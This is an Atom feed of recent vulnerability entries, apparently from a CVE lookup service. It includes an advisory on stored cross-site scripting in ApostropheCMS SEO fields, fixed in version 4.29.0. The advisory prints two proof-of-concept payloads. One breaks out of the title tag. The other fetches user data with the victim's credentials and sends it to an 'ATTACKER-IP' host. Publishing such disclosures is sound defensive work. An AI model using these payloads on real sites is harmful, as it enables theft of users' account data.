<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
  <id>https://cve.radiocsirt.org/rss/recent/all/10</id>
  <title>Most recent entries from all</title>
  <updated>2026-10-09T09:21:04.974783+00:00</updated>
  <author>
    <name>Vulnerability-Lookup</name>
    <email>csirt@opendfir.org</email>
  </author>
  <link href="https://cve.radiocsirt.org" rel="alternate"/>
  <generator uri="https://lkiesow.github.io/python-feedgen" version="1.0.0">python-feedgen</generator>
  <subtitle>Contains only the most 10 recent entries.</subtitle>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/euvd-2026-318556</id>
    <title>EUVD-2026-318556</title>
    <updated>2026-10-09T09:21:04.977094+00:00</updated>
    <content>EUVD-2026-318556</content>
    <link href="https://cve.radiocsirt.org/vuln/euvd-2026-318556"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/fkie_cve-2026-35569</id>
    <title>fkie_cve-2026-35569</title>
    <updated>2026-10-09T09:21:04.977127+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml">
        <p>ApostropheCMS is an open-source Node.js content management system. Versions 4.28.0 and prior contain a stored cross-site scripting vulnerability in SEO-related fields (SEO Title and Meta Description), where user-controlled input is rendered without proper output encoding into HTML contexts including &lt;title&gt; tags, &lt;meta&gt; attributes, and JSON-LD structured data. An attacker can inject a payload such as "&gt;&lt;/title&gt;&lt;script&gt;alert(1)&lt;/script&gt; to break out of the intended HTML context and execute arbitrary JavaScript in the browser of any authenticated user who views the affected page. This can be leveraged to perform authenticated API requests, access sensitive data such as usernames, email addresses, and roles via internal APIs, and exfiltrate it to an attacker-controlled server. This issue has been fixed in version 4.29.0.</p>
      </div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/fkie_cve-2026-35569"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/ghsa-855c-r2vq-c292</id>
    <title>GHSA-855c-r2vq-c292 — Stored XSS in SEO Fields Leads to Authenticated API Data Exposure in ApostropheCMS</title>
    <updated>2026-10-09T09:21:04.977163+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml"><p><strong>Affected:</strong> npm: apostrophe</p>
<p>## Summary</p>
<p>A stored cross-site scripting (XSS) vulnerability exists in SEO-related fields (SEO Title and Meta Description) in ApostropheCMS.</p>
<p>Improper neutralization of user-controlled input in SEO-related fields allows injection of arbitrary JavaScript into HTML contexts, resulting in stored cross-site scripting (XSS). This can be leveraged to perform authenticated API requests and exfiltrate sensitive data, resulting in a compromise of application confidentiality.</p>
<p>## Affected Version
ApostropheCMS (tested on version: v4.28.0)</p>
<p>## Vulnerability Details
User-controlled input in SEO fields is improperly handled and rendered into HTML contexts such as:</p>
<p>- `&lt;title&gt;`
- `&lt;meta&gt;` attributes
- structured data (JSON-LD)</p>
<p>This allows attackers to inject and execute arbitrary JavaScript in the context of authenticated users.</p>
<p>## PoC 1</p>
<p>**The following payload demonstrates breaking out of HTML context:**
```javascript
"&gt;&lt;/title&gt;&lt;script&gt;alert(1)&lt;/script&gt;
```
This confirms:
  - Improper output encoding
  - Ability to escape `&lt;title&gt; / &lt;meta&gt;` contexts
  - Arbitrary script execution</p>
<p>## PoC 2
**This PoC demonstrates how the stored XSS can be leveraged to perform authenticated API requests and exfiltrate sensitive data.**
```javascript
"&gt;&lt;/title&gt;&lt;script&gt;
fetch('/api/v1/@apostrophecms/user', {
  credentials:'include'
})
.then(r=&gt;r.text())
.then(d=&gt;{
  fetch('http://ATTACKER-IP:5656/?data='+btoa(d))
})
&lt;/script&gt;
```</p>
<p>## Video Proof of Concept</p>
<p>Watch the following YouTube video for a ful…</p></div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/ghsa-855c-r2vq-c292"/>
  </entry>
</feed>
